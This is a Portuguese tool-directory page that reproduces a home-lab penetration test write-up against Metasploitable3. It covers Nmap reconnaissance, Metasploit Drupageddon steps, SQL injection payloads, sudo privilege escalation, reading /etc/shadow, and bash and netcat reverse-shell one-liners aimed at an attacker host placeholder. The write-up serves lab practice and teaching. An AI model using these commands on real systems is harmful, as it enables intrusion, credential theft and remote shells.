Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
metasploitable3-pentest-writeup — Relatório de teste de penetração em home-lab do Metasploitable3 cobrindo reconhecimento com Nmap, RCE do Drupalgeddon, injeção de SQL, reutilização de credenciais SSH, escalonamento de privilégios via sudo e reverse shells. | Kitploit
Ferramentas/GitHubGitHub/adfortunato/metasploitable3-pentest-writeup
Escalada de PrivilégiosReconhecimentoAtaques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoCTFTestes de Penetração

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Aprendizado e Educação
Labs e Prática
GitHubadfortunato/metasploitable3-pentest-writeup

metasploitable3-pentest-writeup

Relatório de teste de penetração em home-lab do Metasploitable3 cobrindo reconhecimento com Nmap, RCE do Drupalgeddon, injeção de SQL, reutilização de credenciais SSH, escalonamento de privilégios via sudo e reverse shells.

Ver Repositório
24há 20 diasAinda não revisado

Metasploitable3 — Relatório de Teste de Penetração

Autor: Arlen Fortunato
Data: Setembro de 2026
Ambiente: Parrot OS (atacante) → Metasploitable3 Ubuntu 14.04 (alvo)
Escopo: Teste de penetração de rede completo — enumeração, exploração, privesc, pós-exploração
Tipo: Home Lab / Prática de Capture The Flag

⚠️ Todas as credenciais abaixo estão censuradas. Este foi um exercício legal e isolado em home-lab.


Ferramentas Utilizadas

FerramentaFunção
NmapVarredura de portas, detecção de serviço/versão, fingerprint de SO
Metasploit (msfconsole)Exploração (CVE-2014-3704), gerenciamento de sessões
msfvenomGeração de payload (reverse shells bash/netcat)
nc (netcat)Listener de reverse shell
curl / sedCriação manual de SQLi + formatação de saída HTML
ssh / scpAcesso remoto, validação de credenciais
openssl s_clientVerificação de serviço TLS/SSL
gobusterForça bruta de diretórios (enumeração web)

Reconhecimento — Varredura Completa de Portas com Nmap

nmap -O -sV -p- -oA metasploitable3 <TARGET_IP>
PortaEstadoServiçoVersão
21/tcpabertaFTPProFTPD 1.3.5
22/tcpabertaSSHOpenSSH 6.6.1p1
80/tcpabertaHTTPApache httpd 2.4.7 (Ubuntu)
445/tcpabertaSMBSamba smbd 3.X–4.X
631/tcpabertaIPPCUPS 1.7
3306/tcpabertaMySQLMySQL (não autorizado)
3500/tcpabertaHTTPWEBrick httpd 1.3.1 (Ruby 2.3.8)
6697/tcpabertaIRCUnrealIRCd
8080/tcpabertaHTTPJetty 8.1.7.v20120910

SO: Linux Ubuntu 14.04, Kernel 3.13.0-24-generic x86_64


Resumo dos Achados

#VulnerabilidadeCVE / TipoPortaSeveridadeResultado
1Fingerprint de versão do UnrealIRCd — sondagem de backdoorCVE-2010-20756697⚠️ Falso positivoVerificação automática do módulo passou, sondagem manual falhou — backdoor ausente na build
2Drupal 7.5 — Drupageddon RCECVE-2014-370480🔴 CríticaShell Meterpreter como www-data
3Aplicação de folha de pagamento — SQLi UNION (manual)Injeção manual80🔴 CríticaDump completo do BD (15 usuários, senhas em texto claro — censuradas)
4SSH — credenciais padrão + reutilizadasPadrão / reutilização de credenciais22🔴 Críticavagrant (NOPASSWD sudo), luke_skywalker (sudo ALL)
5Escalação de privilégios (dois caminhos)sudo mal configuradoN/A🔴 Críticaroot via ambas as contas
6Dump do shadowPós-exploraçãoN/A🔴 Crítica16 hashes md5crypt extraídos
7Reverse shells (bash + netcat)msfvenom / criação manual4444/4445🟠 AltaShells interativos capturados no listener do atacante

Detalhes dos Achados

1. UnrealIRCd 3.2.8.1 (CVE-2010-2075) — Falso Positivo

Vulnerabilidade: O UnrealIRCd 3.2.8.1 foi historicamente distribuído com um binário trojanizado que executa comandos arbitrários quando um cliente não autenticado envia uma string de gatilho antes do registro — RCE como o usuário do daemon IRC.

Tentativa de exploração: Módulo Metasploit exploit/unix/irc/unreal_ircd_3281_backdoor com payloads cmd/unix/reverse_perl, cmd/unix/reverse_netcat, cmd/unix/reverse_bash. A verificação automática do módulo reportou o serviço como vulnerável; nenhuma sessão retornou em nenhum payload.

Solução de problemas realizada:

  • Porta acessível (nc -vz)
  • Porta confirmada como IRC em texto claro, não TLS (openssl s_client)
  • Conexão reversa manual a partir do alvo confirmou que a rede de saída funciona
  • Gatilho manual do backdoor via nc retornou erro de protocolo IRC 451 — comando interpretado como comando IRC, nunca executado

Conclusão: O banner de versão indica a build vulnerável, mas o backdoor está ausente nesta instância (binário limpo/recompilado). Classificado como não explorável — falso positivo, com evidências.


2. Drupal 7.5 — Drupageddon (CVE-2014-3704)

Vulnerabilidade: O Drupal 7.x anterior ao 7.32 contém uma injeção SQL crítica na camada de abstração de banco de dados, permitindo execução remota de código não autenticada.

Confirmação de versão: CHANGELOG.txt → "Drupal 7.5, 2011-07-27"

Exploração:

msfconsole
use exploit/multi/http/drupal_drupageddon
set RHOSTS <TARGET_IP>
set TARGETURI /drupal/
set LHOST <ATTACKER_IP>
set payload php/meterpreter_reverse_tcp
run

Resultado:

getuid  → www-data
sysinfo → Linux ubuntu 3.13.0-24-generic x86_64
pwd     → /var/www/html/drupal

Enumeração pós-exploração:

  • /var/www/html: chat/, drupal/, payroll_app.php, phpmyadmin/
  • /home: 16 contas de usuário

3. Aplicação de Folha de Pagamento — Injeção SQL Baseada em UNION (Manual)

Vulnerabilidade: Formulário de login do payroll_app.php, injeção SQL no campo de senha. Nenhuma automação utilizada — criada via curl.

Passo 1 — Bypass de autenticação:

' or 1=1#

' fecha a string SQL, or 1=1 força verdadeiro, # comenta a aspa final.

Passo 2 — Contagem de colunas + mapeamento de exibição:

' UNION SELECT null, null, null, null#     -- sem erro = 4 colunas
' UNION SELECT 1, 2, 3, 4#                 -- marcadores: 1=Username, 2=First, 3=Last, 4=Salary

Passo 3 — Enumeração do information_schema:

PerguntaResposta
Versão do BD / usuárioMySQL 5.5.62, root@localhost
Bancos de dadosinformation_schema, drupal, mysql, payroll, performance_schema
Tabelas em payrollusers
Colunas em usersusername, first_name, last_name, password, salary

Passo 4 — Dump (senhas censuradas):

' UNION SELECT username, password, salary, null FROM users#
UsernameSenhaSalário
leia_organa[CENSURADO]9560
luke_skywalker[CENSURADO]1080
han_solo[CENSURADO]1200
artoo_detoo[CENSURADO]22222
boba_fett[CENSURADO]20000
greedo[CENSURADO]50000
(+ 9 outras contas)[CENSURADO]—

4. SSH — Credenciais Padrão e Reutilização de Credenciais

Caminho 1 — Conta padrão: par de credenciais padrão vagrant autenticado via SSH → usuário no grupo sudo com (ALL : ALL) NOPASSWD: ALL.

Caminho 2 — Reutilização de credenciais: credenciais obtidas do dump de SQLi autenticaram diretamente via SSH como outro usuário do lab (luke_skywalker, grupo sudo, (ALL : ALL) ALL).

Significância: demonstra reutilização de credenciais entre serviços — credenciais de aplicação mapeadas para uma conta de sistema.


5. Escalação de Privilégios (Dois Caminhos)

  • Caminho A: vagrant → sudo -l mostra NOPASSWD: ALL → sudo su - → uid=0(root).
  • Caminho B: luke_skywalker → sudo (ALL : ALL) ALL → sudo su - → uid=0(root).

Nenhum exploit local necessário — ambas as contas possuem permissões sudo excessivamente permissivas.


6. Dump do Shadow

sudo cat /etc/shadow

Extraídos 16 hashes md5crypt ($1$) — coleta completa de credenciais após privesc.


7. Pós-Exploração — Reverse Shells

Payload 1 — bash:

bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1

Capturado em nc -lnvp 4444 → shell interativo.

Payload 2 — netcat (named-pipe):

mkfifo /tmp/fifo; nc <ATTACKER_IP> 4445 0</tmp/fifo | /bin/sh >/tmp/fifo 2>&1; rm /tmp/fifo

Capturado em nc -lnvp 4445 → shell interativo.

Mecanismo: named pipe (FIFO) conecta stdin/stdout do netcat ao /bin/sh, formando um túnel bidirecional de socket único; FIFO removido após o uso.


Recomendações de Remediação

Baixar ferramenta